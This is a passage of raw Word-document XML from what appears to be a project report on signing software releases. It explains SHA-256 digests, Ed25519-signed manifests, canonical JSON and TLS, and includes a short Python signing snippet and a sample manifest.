          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: anyone, including an attacker, can compute the digest of a malicious file. That is why the digest is placed inside a signed manifest.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.4.2 Ed25519: authenticity and integrity of the manifest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ed25519 (EdDSA over Curve25519, RFC 8032 [5], approved in FIPS 186-5 [6]) signs the release manifest. The vendor signs with its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>private key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and customers verify with the matching </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>public key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> stored in their trusted keystore (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>keys/&lt;key_id&gt;_pub.pem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>). A valid signature proves the key holder approved exactly this manifest, including the SHA-256 of the artifact, the version, the signer and the key ID. Changing any field, even the timestamp, makes verification fail. Ed25519 offers about 128-bit security with 32-byte keys and 64-byte signatures. It is fast and deterministic, so it cannot leak the key through a bad random number at signing time, a well-known ECDSA pitfall.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Vendor:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> artifact → SHA-256 → manifest → canonical JSON → Ed25519 sign (private key) → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>signature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Base64) added to the manifest.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Customer:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> manifest without </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>signature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> → the same canonical JSON → Ed25519 verify (trusted public key) → recompute the artifact's SHA-256 and compare it with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>manifest.sha256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The private key is never given to customers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> If it were, anyone who compromised any one customer could sign malware that every other customer would accept.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5832000" cy="1379613"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="crypto_flow.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="1379613"/>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5.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Signing (vendor) and verification (customer) flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.4.3 Canonical JSON</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A signature covers exact bytes, but the same JSON object can be written in many ways (key order, spacing). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sign.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>manifest.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> therefore serialise the manifest with sorted keys, compact separators and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>signature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> field removed. This produces identical bytes at signing and at verification on every platform, following the idea of the JSON Canonicalization Scheme (RFC 8785 [7]).</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def canonical_json_bytes(data):                      # vendor/sign.py</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    clean_data = {k: v for k, v in data.items() if k != "signature"}</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    return json.dumps(clean_data, sort_keys=True, separators=(",", ":")).encode("utf-8")</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>raw_signature = priv_key.sign(canonical_bytes)        # Ed25519</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>signed_manifest["signature"] = base64.b64encode(raw_signature).decode("ascii")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5.4.4 Why hashing alone is insufficient, and where TLS fits</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In the Codecov scenario the attacker controlled the storage location. A checksum stored beside the script can be replaced as easily as the script. With our design, the attacker would have to produce a valid Ed25519 signature over a manifest carrying the new digest, which is infeasible without the vendor's private key. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>TLS 1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (RFC 8446 [8]) remains useful for the transport: it gives confidentiality, integrity and server authentication on the wire and stops network man-in-the-middle attacks. However, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>TLS cannot guarantee that the file was not modified before transmission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, and in the incident it was. Signatures protect the object end to end, whatever channel or mirror delivered it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 5.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Cryptographic primitives and their purpose</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2381"/>
        <w:gridCol w:w="3628"/>
        <w:gridCol w:w="2948"/>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Primitive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Used for (in this project)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2948"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Security property</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SHA-256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Artifact digest; provenance artifact digest; key fingerprint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2948"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Integrity / fingerprint</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Ed25519</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Signature over the canonical release manifest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2948"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Authenticity, integrity, non-repudiation</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TLS 1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Transport between storage/CDN and customer (deployment design)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2948"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Channel confidentiality and integrity, server authentication</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Trusted public keys + allowed key IDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Customer trust store and admission policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2948"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Which signers are trusted</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Key revocation list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Invalidating leaked or retired keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2948"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Key lifecycle control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2381"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>PKCS#8 encryption (optional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3628"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Passphrase-protected private key files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2948"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Key confidentiality at rest (HSM/KMS in production)</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 xml:space="preserve">To avoid common misconceptions, the design does </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> claim that hashing provides authentication, that TLS alone stops a malicious vendor artifact, or that encryption proves who produced a file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.5 Signed Release Manifest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The manifest below was produced by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>vendor/sign.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in our validation run (signature shortened):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w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  "artifact": "uploader.sh",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  "version": "1.0.0",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  "sha256": "2ae9d028d511c188b07044b2c1794a4e46c707c022ac9af6ca5398ad67c81619",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  "algorithm": "SHA-256",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
